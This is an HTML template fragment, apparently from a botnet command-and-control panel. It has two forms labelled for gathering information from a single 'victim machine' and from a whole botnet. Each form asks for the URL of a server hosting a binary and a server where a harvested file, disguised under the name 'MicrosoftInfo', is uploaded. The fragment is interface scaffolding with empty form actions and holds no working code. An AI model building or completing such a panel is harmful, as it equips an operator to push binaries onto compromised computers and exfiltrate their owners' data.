<app-menu></app-menu>
<h2>GET INFORMATION ABOUT VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to get some info about Victim Machine. File Name with Info: "MicrosoftInfo".</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>IP/DNS server where upload the file ("localhost")<input type="text" /></p>
  <input type="submit" value="Info BOT Machine" />
</form>

<h2>GET INFORMATION FROM BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to get some info about all Victim Machines. File Name with Info: "MicrosoftInfo" will be saved in each specific ID folder.</p>
  <p>Link HTTP server where binary is("http://localhost")<input type="text" /></p>
  <p>IP/DNS server where upload the file ("localhost")<input type="text" /></p>
  <input type="submit" value="Info BOTNET Machine" />
</form>
